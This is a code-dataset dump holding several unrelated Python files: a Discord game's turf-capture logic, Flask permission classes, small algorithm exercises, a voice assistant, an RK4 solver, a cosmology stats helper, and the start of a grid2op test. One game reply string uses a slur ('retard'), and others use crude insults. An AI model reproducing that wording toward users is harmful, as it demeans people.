round_to_minutes = True))\n\t\t\t\t\tmessage = \"{faction} just captured {district}. {countdown}\".format(\n\t\t\t\t\t\tfaction = self.capturing_faction.capitalize(),\n\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\tcountdown = countdown_message\n\t\t\t\t\t)\n\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\t\t\n\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\tresp_cont_owner.add_channel_response(channel = ch, response = message)\n\t\t\t\telse: # successful de-capture or full decay\n\t\t\t\t\tif actor != ewcfg.actor_decay:\n\t\t\t\t\t\tmessage = \"{faction} just wrested control over {district} from the {other_faction}.\".format(\n\t\t\t\t\t\t\tfaction = actor.capitalize(),\n\t\t\t\t\t\t\tdistrict = ewcfg.id_to_poi[self.name].str_name,\n\t\t\t\t\t\t\tother_faction = self.controlling_faction # the faction that just lost control\n\t\t\t\t\t\t)\n\t\t\t\t\t\tchannels = [ewcfg.id_to_poi[self.name].channel] + ewcfg.hideout_channels\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor ch in channels:\n\t\t\t\t\t\t\tresp_cont_owner.add_channel_response(channel = ch, response = message)\n\n\t\t\t\tself.controlling_faction = new_owner\n\n\t\treturn resp_cont_owner\n\n\t\"\"\" add or remove slime \"\"\"\n\tdef change_slimes(self, n = 0, source = None):\n\t\tchange = int(n)\n\t\tself.slimes += change\n\n\"\"\"\n\tInforms the player about their current zone's capture progress\n\"\"\"\nasync def capture_progress(cmd):\n\tuser_data = EwUser(member = cmd.message.author)\n\tresponse = \"\"\n\n\tpoi = ewcfg.id_to_poi.get(user_data.poi)\n\tresponse += \"**{}**: \".format(poi.str_name)\n\n\tif not user_data.poi in ewcfg.capturable_districts:\n\t\tresponse += \"This zone cannot be captured.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tdistrict_data = EwDistrict(id_server = user_data.id_server, district = user_data.poi)\n\n\n\tif district_data.controlling_faction != \"\":\n\t\tresponse += \"{} control this district. \".format(district_data.controlling_faction.capitalize())\n\telif district_data.capturing_faction != \"\":\n\t\tresponse += \"{} are capturing this district. \".format(district_data.capturing_faction.capitalize())\n\telse:\n\t\tresponse += \"Nobody has staked a claim to this district yet. \".format(district_data.controlling_faction.capitalize())\n\n\tresponse += \"Current capture progress: {:.3g}%\".format(100 * district_data.capture_points / district_data.max_capture_points)\n\n\tif district_data.time_unlock > 0:\n\n\n\t\tresponse += \"\\nThis district cannot be captured currently. It will unlock in {}.\".format(ewutils.formatNiceTime(seconds = district_data.time_unlock, round_to_minutes = True))\n\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\t\n\nasync def annex(cmd):\n\tuser_data = EwUser(member = cmd.message.author)\n\tresponse = \"\"\n\tresp_cont = ewutils.EwResponseContainer(id_server = cmd.message.server.id)\n\ttime_now = int(time.time())\n\n\tpoi = ewcfg.id_to_poi.get(user_data.poi)\n\n\tif user_data.life_state == ewcfg.life_state_corpse:\n\t\tresponse = \"You ineffectively try shaking your can of spraypaint to whip up some sick graffiti. Alas, you’re all outta slime. \" \\\n \"They should really make these things compatible with ectoplasm.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif not (len(user_data.faction) > 0 and user_data.life_state == ewcfg.life_state_enlisted):\n\t\tresponse = \"Juveniles are too chickenshit to make graffiti and risk getting busted by the cops. Fuckin’ losers.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif user_data.poi in [ewcfg.poi_id_rowdyroughhouse, ewcfg.poi_id_copkilltown]:\n\t\tresponse = \"There’s no point, the rest of your gang has already covered this place in spraypaint. Focus on exporting your graffiti instead.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif user_data.poi == ewcfg.poi_id_juviesrow:\n\t\tresponse = \"Nah, the Rowdys and Killers have both agreed this is neutral ground. You don’t want to start a diplomatic crisis, \" \\\n \"just stick to spraying down sick graffiti and splattering your rival gang across the pavement in the other districts.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif not user_data.poi in ewcfg.capturable_districts:\n\t\tresponse = \"This zone cannot be captured.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tdistrict_data = EwDistrict(id_server = user_data.id_server, district = user_data.poi)\n\n\tif district_data.time_unlock > 0:\n\t\tresponse = \"You can’t spray graffiti here yet, it’s too soon after your rival gang extended their own cultural dominance over it. Try again in {}.\".format(ewutils.formatNiceTime(seconds = district_data.time_unlock, round_to_minutes = True))\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif district_data.all_neighbors_friendly():\n\t\tresponse = \"What the hell are you doing, dude? You can’t put down any graffiti here, it’s been completely overrun by your rival gang. \" \\\n \"You can only spray districts that have at least one unfriendly neighbor, duh!\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\t\n\tusers_in_district = district_data.get_players_in_district(\n\t\tlife_states = [ewcfg.life_state_enlisted],\n\t\tignore_offline = True,\n\t\tpvp_only = True\n\t)\n\n\tallies_in_district = district_data.get_players_in_district(\n\t\tfactions = [user_data.faction],\n\t\tlife_states = [ewcfg.life_state_enlisted],\n\t\tignore_offline = True,\n\t\tpvp_only = True\n\t)\n\n\tif len(users_in_district) > len(allies_in_district):\n\t\tresponse = \"Holy shit, deal with your rival gangsters first! You can’t spray graffiti while they’re on the prowl!\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tmutations = user_data.get_mutations()\n\n\tslimes_spent = ewutils.getIntToken(tokens = cmd.tokens, allow_all = True)\n\tcapture_discount = 1\n\n\tif ewcfg.mutation_id_lonewolf in mutations:\n\t\tif user_data.time_expirpvp > time_now:\n\t\t\tif len(users_in_district) == 1:\n\t\t\t\tcapture_discount *= 0.8\n\t\telse:\n\t\t\tif len(users_in_district) == 0:\n\t\t\t\tcapture_discount *= 0.8\n\n\tif ewcfg.mutation_id_patriot in mutations:\n\t\tcapture_discount *= 0.8\n\n\tif slimes_spent == None:\n\t\tresponse = \"How much slime do you want to spend on spraying graffiti in this district?\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tif slimes_spent < 0:\n\t\tslimes_spent = user_data.slimes\n\n\tif slimes_spent > user_data.slimes:\n\t\tresponse = \"You don't have that much slime, retard.\"\n\t\treturn await ewutils.send_message(cmd.client, cmd.message.channel, ewutils.formatMessage(cmd.message.author, response))\n\n\tnum_lock = len(allies_in_district)\n\tif user_data.time_expirpvp < time_now:\n\t\tnum_lock += 1\n\n\tif (district_data.controlling_faction not in [\"\", user_data.faction]) or (district_data.capturing_faction not in [\"\", user_data.faction]):\n\t\tslimes_decap = min(district_data.capture_points, int(slimes_spent / capture_discount))\n\t\tdecap_resp = district_data.change_capture_points(\n\t\t\tprogress = -slimes_decap,\n\t\t\tactor = user_data.faction,\n\t\t\tnum_lock = num_lock\n\t\t)\n\t\tresp_cont.add_response_container(decap_resp)\n\t\t\n\t\tuser_data.change_slimes(n = -slimes_decap * capture_discount, source = ewcfg.source_spending)\n\t\tslimes_spent -= slimes_decap * capture_discount\n\n\tslimes_cap = min(district_data.max_capture_points - district_data.capture_points, int(slimes_spent / capture_discount))\n\tcap_resp = district_data.change_capture_points(\n\t\tprogress = slimes_cap,\n\t\tactor = user_data.faction,\n\t\tnum_lock = num_lock\n\t)\n\tresp_cont.add_response_container(cap_resp)\n\t\t\n\tuser_data.change_slimes(n = -slimes_cap * capture_discount, source = ewcfg.source_spending)\n\n\t# Flag the user for PvP\n\tuser_data.time_expirpvp = ewutils.calculatePvpTimer(user_data.time_expirpvp, (int(time.time()) + ewcfg.time_pvp_annex))\n\n\tuser_data.persist()\n\tdistrict_data.persist()\n\tawait ewrolemgr.updateRoles(client = cmd.client, member = cmd.message.author)\n\n\treturn await resp_cont.post()\n\n\"\"\"\n\tUpdates/Increments the capture_points values of all districts every time it's called\n\"\"\"\nasync def capture_tick(id_server):\n\t# the variables might apparently be accessed before assignment if i didn't declare them here\n\tcursor = None\n\tconn_info = None\n\n\tresp_cont_capture_tick = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = id_server)\n\n\tall_districts = ewcfg.capturable_districts\n\n\n\tif len(all_districts) > 0: # if all_districts isn't empty\n\t\tserver = ewcfg.server_list[id_server]\n\t\ttime_old = time.time()\n\n\t\tfor district in all_districts:\n\t\t\tdistrict_name = district\n\t\t\tdist = EwDistrict(id_server = id_server, district = district_name)\n\n\t\t\tif dist.time_unlock > 0 and not dist.all_neighbors_friendly():\n\t\t\t\tresponses = dist.change_capture_lock(progress = -ewcfg.capture_tick_length)\n\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\t\t\t\tdist.persist()\n\n\t\t\tif dist.time_unlock > 0:\n\t\t\t\tcontinue\n\n\t\t\t# no more automatic capping\n\t\t\tcontinue\n\n\t\t\tcontrolling_faction = dist.controlling_faction\n\n\t\t\tgangsters_in_district = dist.get_players_in_district(min_slimes = ewcfg.min_slime_to_cap, life_states = [ewcfg.life_state_enlisted], ignore_offline = True)\n\t\t\t\t\t\n\n\t\t\tslimeoids = ewutils.get_slimeoids_in_poi(poi = district_name, id_server = id_server, sltype = ewcfg.sltype_nega)\n\t\t\t\n\t\t\tnega_present = len(slimeoids) > 0\n#\t\t\tif nega_present:\n#\t\t\t\tcontinue\n\n\t\t\t# the faction that's actively capturing the district this tick\n\t\t\t# if no players are present, it's None, if only players of one faction (ignoring juvies and ghosts) are,\n\t\t\t# it's the faction's name, i.e. 'rowdys' or 'killers', and if both are present, it's 'both'\n\t\t\tfaction_capture = None\n\n\t\t\t# how much progress will be made. is higher the more people of one faction are in a district, and is 0 if both teams are present\n\t\t\tcapture_speed = 0\n\n\t\t\t# number of players actively capturing\n\t\t\tnum_capturers = 0\n\n\t\t\tdc_stat_increase_list = []\n\n\t\t\t# checks if any players are in the district and if there are only players of the same faction, i.e. progress can happen\n\t\t\tfor player in gangsters_in_district:\n\t\t\t\tplayer_id = player\n\t\t\t\tuser_data = EwUser(id_user = player_id, id_server = id_server)\n\t\t\t\tplayer_faction = user_data.faction\n\n\t\t\t\tmutations = user_data.get_mutations()\n\n\t\t\t\ttry:\n\t\t\t\t\tplayer_online = server.get_member(player_id).status != discord.Status.offline\n\t\t\t\texcept:\n\t\t\t\t\tplayer_online = False\n\n\t\t\t\t#ewutils.logMsg(\"Online status checked. Time elapsed: %f\" % (time.time() - time_old) + \" Server: %s\" % id_server + \" Player: %s\" % player_id + \" Status: %s\" % (\"online\" if player_online else \"offline\"))\n\n\t\t\t\tif player_online:\n\t\t\t\t\tif faction_capture not in [None, player_faction]: # if someone of the opposite faction is in the district\n\t\t\t\t\t\tfaction_capture = 'both' # standstill, gang violence has to happen\n\t\t\t\t\t\tcapture_speed = 0\n\t\t\t\t\t\tnum_capturers = 0\n\t\t\t\t\t\tdc_stat_increase_list.clear()\n\n\t\t\t\t\telse: # if the district isn't already controlled by the player's faction and the capture isn't halted by an enemy\n\t\t\t\t\t\tfaction_capture = player_faction\n\t\t\t\t\t\tplayer_capture_speed = 1\n\t\t\t\t\t\tif ewcfg.mutation_id_lonewolf in mutations and len(gangsters_in_district) == 1:\n\t\t\t\t\t\t\tplayer_capture_speed *= 2\n\t\t\t\t\t\tif ewcfg.mutation_id_patriot in mutations:\n\t\t\t\t\t\t\tplayer_capture_speed *= 2\n\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tcapture_speed += player_capture_speed\n\t\t\t\t\t\tnum_capturers += 1\n\t\t\t\t\t\tdc_stat_increase_list.append(player_id)\n\n\n\t\t\tif faction_capture not in ['both', None]: # if only members of one faction is present\n\t\t\t\tif district_name in ewcfg.capturable_districts:\n\t\t\t\t\tfriendly_neighbors = dist.get_number_of_friendly_neighbors()\n\t\t\t\t\tif dist.all_neighbors_friendly():\n\t\t\t\t\t\tcapture_speed = 0\n\t\t\t\t\telif dist.controlling_faction == faction_capture:\n\t\t\t\t\t\tcapture_speed *= 1 + 0.1 * friendly_neighbors\n\t\t\t\t\telse:\n\t\t\t\t\t\tcapture_speed /= 1 + 0.1 * friendly_neighbors\n\n\t\t\t\t\tcapture_progress = dist.capture_points\n\n\t\t\t\t\tif faction_capture != dist.capturing_faction:\n\t\t\t\t\t\tcapture_progress *= -1\n\n\t\t\t\t\tcapture_speed *= ewcfg.baseline_capture_speed\n\n\n\t\t\t\t\tif dist.capture_points < dist.max_capture_points:\n\t\t\t\t\t\tfor stat_recipient in dc_stat_increase_list:\n\t\t\t\t\t\t\tewstats.change_stat(\n\t\t\t\t\t\t\t\tid_server = id_server,\n\t\t\t\t\t\t\t\tid_user = stat_recipient,\n\t\t\t\t\t\t\t\tmetric = ewcfg.stat_capture_points_contributed,\n\t\t\t\t\t\t\t\tn = ewcfg.capture_tick_length * capture_speed\n\t\t\t\t\t\t\t)\n\n\t\t\t\t\tif faction_capture == dist.capturing_faction: # if the faction is already in the process of capturing, continue\n\t\t\t\t\t\tresponses = dist.change_capture_points(ewcfg.capture_tick_length * capture_speed, faction_capture, num_capturers)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\telif dist.capture_points == 0 and dist.controlling_faction == \"\": # if it's neutral, start the capture\n\t\t\t\t\t\tresponses = dist.change_capture_points(ewcfg.capture_tick_length * capture_speed, faction_capture, num_capturers)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\t\tdist.capturing_faction = faction_capture\n\n\t\t\t\t\t# lower the enemy faction's progress to revert it to neutral (or potentially get it onto your side without becoming neutral first)\n\t\t\t\t\telse: # if the (de-)capturing faction is not in control\n\t\t\t\t\t\tresponses = dist.change_capture_points(-(ewcfg.capture_tick_length * capture_speed * ewcfg.decapture_speed_multiplier), faction_capture)\n\t\t\t\t\t\tresp_cont_capture_tick.add_response_container(responses)\n\n\t\t\t\t\tdist.persist()\n\n\tawait resp_cont_capture_tick.post()\n\n\"\"\"\n\tCoroutine that continually calls capture_tick; is called once per server, and not just once globally\n\"\"\"\nasync def capture_tick_loop(id_server):\n\tinterval = ewcfg.capture_tick_length\n\t# causes a capture tick to happen exactly every 10 seconds (the \"elapsed\" thing might be unnecessary, depending on how long capture_tick ends up taking on average)\n\twhile not ewutils.TERMINATE:\n\t\tawait capture_tick(id_server = id_server)\n\t\t# ewutils.logMsg(\"Capture tick happened on server %s.\" % id_server + \" Timestamp: %d\" % int(time.time()))\n\n\t\tawait asyncio.sleep(interval)\n\n\"\"\"\n\tGives both kingpins the appropriate amount of slime for how many districts they own and lowers the capture_points property of each district by a certain amount, turning them neutral after a while\n\"\"\"\nasync def give_kingpins_slime_and_decay_capture_points(id_server):\n\tresp_cont_decay_loop = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = id_server)\n\n\tfor kingpin_role in [ewcfg.role_rowdyfucker, ewcfg.role_copkiller]:\n\t\tkingpin = ewutils.find_kingpin(id_server = id_server, kingpin_role = kingpin_role)\n\n\t\tif kingpin is not None:\n\t\t\ttotal_slimegain = 0\n\t\t\tfor id_district in ewcfg.capturable_districts:\n\n\t\t\t\tdistrict = EwDistrict(id_server = id_server, district = id_district)\n\n\t\t\t\t# if the kingpin is controlling this district give the kingpin slime based on the district's property class\n\t\t\t\tif district.controlling_faction == (ewcfg.faction_killers if kingpin.faction == ewcfg.faction_killers else ewcfg.faction_rowdys):\n\t\t\t\t\tslimegain = ewcfg.district_control_slime_yields[district.property_class]\n\t\t\t\t\t# increase slimeyields by 10 percent per friendly neighbor\n\t\t\t\t\tfriendly_mod = 1 + 0.1 * district.get_number_of_friendly_neighbors()\n\t\t\t\t\ttotal_slimegain += slimegain * friendly_mod\n\n\t\t\tkingpin.change_slimes(n = total_slimegain)\n\t\t\tkingpin.persist()\n\n\t\t\tewutils.logMsg(kingpin_role + \" just received %d\" % total_slimegain + \" slime for their captured districts.\")\n\n\t# Decay capture points.\n\tfor id_district in ewcfg.capturable_districts:\n\t\tdistrict = EwDistrict(id_server = id_server, district = id_district)\n\n\t\tresponses = district.decay_capture_points()\n\t\tresp_cont_decay_loop.add_response_container(responses)\n\t\tdistrict.persist()\n\tawait resp_cont_decay_loop.post()\n","repo_name":"Peregri/endless-war","sub_path":"ewdistrict.py","file_name":"ewdistrict.py","file_ext":"py","file_size_in_byte":34856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"40244562950","text":"from flask_principal import Permission, ItemNeed, RoleNeed\nfrom util.database import engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n\nclass UserPermission(Permission):\n def __init__(self, action, idr):\n needPermiso = ItemNeed(action, idr, 'manage')\n super(UserPermission, self).__init__(needPermiso)\n \nclass UserRol(Permission):\n def __init__(self, rol):\n need = RoleNeed(rol)\n super(UserRol, self).__init__(need)","repo_name":"elevazquez/sap","sub_path":"src/UserPermission.py","file_name":"UserPermission.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10841520553","text":"class Solution(object):\n def judgeCircle(self, moves):\n \"\"\"\n :type moves: str\n :rtype: bool\n \"\"\"\n count = dict.fromkeys(list('UDLR'), 0)\n for c in moves:\n count[c] += 1\n if count['U'] == count['D'] and count['L'] == count['R']:\n return True\n return False\n","repo_name":"ChrisYoungGH/LeetCode","sub_path":"657.JudgeRouteCircle/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39366824023","text":"def binary_search(list, target):\n \"\"\"\n \"\"\"\n first = 0\n last = len(list) - 1\n while first <= last:\n midpoint = (first + last) // 2\n\n if(list[midpoint] == target):\n return midpoint\n elif list[midpoint] < target:\n first = midpoint + 1\n else:\n last = midpoint - 1\n return None\n\n\nif __name__ == \"__main__\":\n number_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n index = binary_search(number_list, 1)\n print(\"INDEX=\", index, \"TARGET=\", number_list[index])\n","repo_name":"GoodnessEzeokafor/treehouse-algorithm","sub_path":"binary_search_first_version.py","file_name":"binary_search_first_version.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40013378785","text":"\nimport pyttsx3 \nimport datetime\nimport speech_recognition as sr\nimport webbrowser as wb\n\nbot = pyttsx3.init()\nvoice = bot.getProperty('voices')\nbot.setProperty('voices',voice[1].id)\n\ndef speak(audio):\n print('bot : '+ audio)\n bot.say(audio)\n bot.runAndWait()\n\ndef time():\n Time = datetime.datetime.now().strftime(\"%I: %M: %p\")\n speak(Time)\ndef welcome():\n hour = datetime.datetime.now().hour\n if hour >= 6 and hour <12 :\n speak(\"Good Morning Joycee\")\n elif hour >= 12 and hour <18 :\n speak(\"Good Afternoon Joycee\")\n elif hour >= 18 and hour <24 :\n speak(\"Good Night Joycee\")\n speak ('How can i help you')\ndef command():\n c=sr.Recognizer()\n with sr.Microphone() as source:\n c.pause_threshold = 2\n audio = c.listen(source)\n try :\n query = c.recognize_google(audio,language='en')\n print(\"Joycee :\"+ query)\n except sr.UnknownValueError:\n print(\"Please repeat or typing the command \")\n query = str(input('Your order is: '))\n return query\nif __name__ == \"__main__\":\n welcome()\n while True :\n query = command().lower()\n if \"google\" in query:\n speak(\"what should I search boss?\")\n search = command().lower()\n url = f\"https://www.google.com/search?q={search}\"\n wb.get().open(url)\n speak(f'Here is your {search} on google') \n if \"youtobe\" in query:\n speak(\"what should I search boss?\")\n search = command().lower()\n url = f\"https://www.youtube.com/search?q={search}\"\n wb.get().open(url)\n speak(f'Here is your {search} on google') \n elif \"time\" in query:\n time()\n elif \"quit\" in query:\n speak(\"I am quitting .Goodbye boss\")\n quit()","repo_name":"Joyce-78/tr-l-o-","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36685138623","text":"import decimal\nimport math\n\n\ndef f(X, Y):\n return decimal.Decimal((-X * Y) / (X * X - 9))\n\n\ndef Y(X):\n return decimal.Decimal(4 / (math.sqrt(X * X - 9)))\n\n\nh = decimal.Decimal('0.05')\nx = []\ny = []\nx.append(decimal.Decimal('5.00'))\ny.append(decimal.Decimal('1.00'))\n\n\nfor i in range(0, 21):\n\n if i >= 1:\n k1 = f(x[i - 1], y[i - 1])\n k2 = f(x[i - 1] + h / 2, y[i - 1] + h * k1 / 2)\n k3 = f(x[i - 1] + h / 2, y[i - 1] + h * k2 / 2)\n k4 = f(x[i - 1] + h, y[i - 1] + h * k3)\n\n x.append(x[i - 1] + h)\n y.append(y[i - 1] + h * (k1 + 2 * k2 + 2 * k3 + k4) / 6)\n\n print(\"x{} =\".format(i), x[i], \" RK4 y{} =\".format(i), \"%.10f\" % y[i], end=\"\")\n print(\" 참값 y{} =\".format(i), \"%.10f\" % Y(x[i]), end=\"\")\n print(\" 절대오차 {} =\".format(i), \"%.10f\" % abs(y[i] - Y(x[i])), end=\"\")\n print(\" 상대오차 {} =\".format(i), \"%.10f\" % (abs(y[i] - Y(x[i])) * 100 / abs(Y(x[i]))), end=\"\")\n print(\"%\")\n \n","repo_name":"mintway0341/RK4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22090250510","text":"from scipy.interpolate import splrep,splev\nimport numpy as np\n\nimport re\nfrom orphics.tools.io import bcolors, Plotter\nimport sys\nfrom math import pi\n\n\ndef loadBinFile(binfile,delimiter='\\t',returnBinner=True):\n\n mat = np.loadtxt(binfile,delimiter=delimiter)\n\n left = mat[:,0]\n right = mat[:,1]\n try:\n center = mat[:,2]\n except:\n print(\"coreStats.py:loadBinFile says \\\"Third column absent in binfile. Using mean of left and right edges.\\\"\")\n center = (left+right)/2.\n\n if returnBinner:\n bin_edges = left.copy()\n bin_edges = np.append(bin_edges,right[-1])\n return coreBinner(bin_edges)\n else:\n return left,right,center\n\nclass smartCls:\n\n def __init__(self,filename,ellrange=None,verbose=False):#colnum=-1,ellrange=None,norm=\"none\",transpower=[0.,1.]):\n\n self.verbose = verbose\n #Do an initial pass through the file\n leng = -1\n maybe_ells = []\n self._fname = filename\n i=0\n with open(filename,'rb') as f:\n for line in f:\n\n row = line.split()\n assert(len(row)==leng or leng==-1), \"ERROR: Not a column file.\"\n leng = len(row)\n if leng>1: maybe_ells.append(float(row[0]))\n i+=1\n #print leng\n #print i\n\n if not(ellrange==None):\n self.ells = ellrange\n \n elif leng>1. and min(maybe_ells)>1. and max(maybe_ells)<20000.:\n self.ells = maybe_ells\n if self.verbose: print(\"Found an ell column. Using it.\")\n else:\n self.ells = np.arange(2.,i+2.,1.)\n print(\"Warning: no ell column detected. Assuming ell range is 2 to ~number of rows.\") \n #print \"First column is ells\"\n\n #if colnum>-1: return self.getCol(colnum,norm=norm,transpower=[0.,1.])\n \n def getCol(self,colnum=0,norm=\"none\",transpower=[0.,1.]):\n\n col=[]\n i=0\n with open(self._fname,'rb') as f:\n for line in f:\n row = line.split()\n l = self.ells[i]\n \n if norm==\"none\":\n m = 1.\n elif norm==\"lsq\":\n m = l*(l+1.)/2./pi\n \n else:\n print(\"ERROR: unrecognized norm factor\")\n sys.exit(1)\n\n\n p = transpower[1]*(l**(transpower[0])) \n #print m\n #print row\n #print colnum\n #print row[colnum]\n col.append(float(row[colnum])*p/m)\n\n i+=1\n \n #print i\n return col\n \n\ndef validateMapType(mapXYType):\n assert not(re.search('[^TEB]', mapXYType)) and (len(mapXYType)==2), \\\n bcolors.FAIL+\"\\\"\"+mapXYType+\"\\\" is an invalid map type. XY must be a two\" + \\\n \" letter combination of T, E and B. e.g TT or TE.\"+bcolors.ENDC\n\n\n\ndef makeTemplate(l,Fl,mod,Nx,Ny,debug=False):\n \"\"\"\n Given 1d function Fl of l, creates the 2d version\n of Fl on 2d k-space defined by mod\n \"\"\"\n\n FlSpline = splrep(l,Fl,k=3) \n ll = np.ravel(mod)\n kk = (splev(ll,FlSpline))\n\n\n template = np.reshape(kk,[Ny,Nx])\n\n \n if debug:\n print(kk)\n myFig = Plotter(\"$l$\",\"$F_l$\",scaleX=\"log\",scaleY=\"log\")\n #myFig.add(l,Fl)\n myFig.add(ll,kk)\n myFig.done(fileName=\"output/interp.png\")\n plotme([mod],saveFile=\"output/mod.png\",axoff=True,clbar=False)\n plotme([template],saveFile=\"output/temp.png\",axoff=True,clbar=False)\n plotme([np.log(template)],saveFile=\"output/logtemp.png\",axoff=True,clbar=False)\n sys.exit()\n \n\n return template\n\ndef loadCls(fileName, colnum, lpad, lmax, factorout=\"none\"):\n '''\n WARNING: For autospectra, CAMB returns negative values beyond a certain ell, which is unphysical,\n so make sure your lpad is set to be less than that ell. Always examine your CAMB output.\n \n Load Cls from a CAMB-output file from column number colnum (>0, zero is assumed to hold ells)\n \n Pad with zeros after lpad\n Return lists that go up to lmax (possibly padded with zeros after lpad)\n factorout options\n 1. none, get Cls as they are\n 2. ll1, divide by l(l+1)/2pi\n 3. ll1sq, divide by (l(l+1)^2/2pi\n 4. ll13o2, divide by (l(l+1))^(3/2)/2pi\n 5. l4, divide by l^4\n 6. l3, divide by l^3\n Return list of ells and list of Cls\n '''\n\n\n uCell=[]\n ell=[]\n\n lFi=open(fileName,'r')\n for line in lFi:\n\n columns = line.split()\n if (float(columns[0])>=lpad):\n break\n ell.append(float(columns[0]))\n uCell.append(float(columns[colnum]))\n\n\n\n ell=np.array(ell)\n\n\n if factorout==\"none\":\n uCellR=np.array(uCell)\n elif factorout==\"ll1\":\n uCellR=np.array([c*2.*pi/l/(l+1.) for c,l in zip(uCell,ell)])\n elif factorout==\"ll1sq\":\n uCellR=np.array([c*2.*pi/l/l/(l+1.)/(l+1.) for c,l in zip(uCell,ell)])\n elif factorout==\"ll13o2\":\n uCellR=np.array([c*2.*pi/((l/(l+1.))**(3./2.)) for c,l in zip(uCell,ell)])\n elif factorout==\"l4\":\n uCellR=np.array([c*2./(l**4.) for c,l in zip(uCell,ell)])\n elif factorout==\"l3\":\n uCellR=np.array([c*2./(l**3.) for c,l in zip(uCell,ell)])\n else:\n print((bcolors.FAIL+\"ERROR: Unrecognized argument \", factorout,\" for factorout.\"+bcolors.ENDC))\n sys.exit()\n\n\n\n lFi.close()\n\n k=int(ell.max())\n apell = list(range(k+1,lmax))\n lastval = uCellR[-1]\n\n\n apucl = np.array([lastval]*len(apell))\n ell = np.append(ell,apell)\n uCellR = np.append(uCellR,apucl)\n \n \n\n\n return (ell), (uCellR)\n\n\n\nclass coreBinner:\n '''\n * Takes data defined on x0 and produces values binned on x.\n * Assumes x0 is linearly spaced and continuous in a domain?\n * Assumes x is continuous in a subdomain of x0.\n * Should handle NaNs correctly.\n '''\n \n\n def __init__(self, bin_edges):\n\n self.updateBinEdges(bin_edges)\n\n\n def updateBinEdges(self,bin_edges):\n \n self.bin_edges = bin_edges\n self.numbins = len(bin_edges)-1\n\n\n def binned(self,x,y):\n\n\n # pretty sure this treats nans in y correctly, but should double-check!\n bin_means = binnedstat(x,y,bins=self.bin_edges,statistic=np.nanmean)[0]\n\n\n \n return bin_means\n\n \n\n def getBinCenters(self,mode=\"mean\"):\n\n if mode==\"mean\":\n return (self.bin_edges[:-1]+self.bin_edges[1:])/2.\n else:\n raise ValueError\n\n\ndef loadBinFile(binfile,delimiter='\\t',returnBinner=True):\n\n mat = np.loadtxt(binfile,delimiter=delimiter)\n\n left = mat[:,0]\n right = mat[:,1]\n try:\n center = mat[:,2]\n except:\n print(\"coreStats.py:loadBinFile says \\\"Third column absent in binfile. Using mean of left and right edges.\\\"\")\n center = (left+right)/2.\n\n if returnBinner:\n bin_edges = left.copy()\n bin_edges = np.append(bin_edges,right[-1])\n return coreBinner(bin_edges)\n else:\n return left,right,center\n","repo_name":"iej2106/dmb_analysis","sub_path":"fishchips/orphics/unmerged/tools/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32444738388","text":"import unittest\nimport warnings\nimport grid2op\nimport numpy as np\nfrom grid2op.Action import PlayableAction\n\nfrom grid2op.simulator import Simulator\nfrom grid2op.Exceptions import SimulatorError, BaseObservationError\n\nimport pdb\n\n\nclass TestSimulator(unittest.TestCase):\n def setUp(self) -> None:\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n self.env = grid2op.make(\"l2rpn_case14_sandbox\",\n test=True,\n _add_to_name=type(self).__name__)\n self.env.seed(0)\n self.obs = self.env.reset()\n\n def tearDown(self) -> None:\n self.env.close()\n\n def test_create(self):\n \"\"\"test i can create them\"\"\"\n simulator = Simulator(backend=self.env.backend)\n assert simulator.backend is not self.env.backend\n\n simulator = 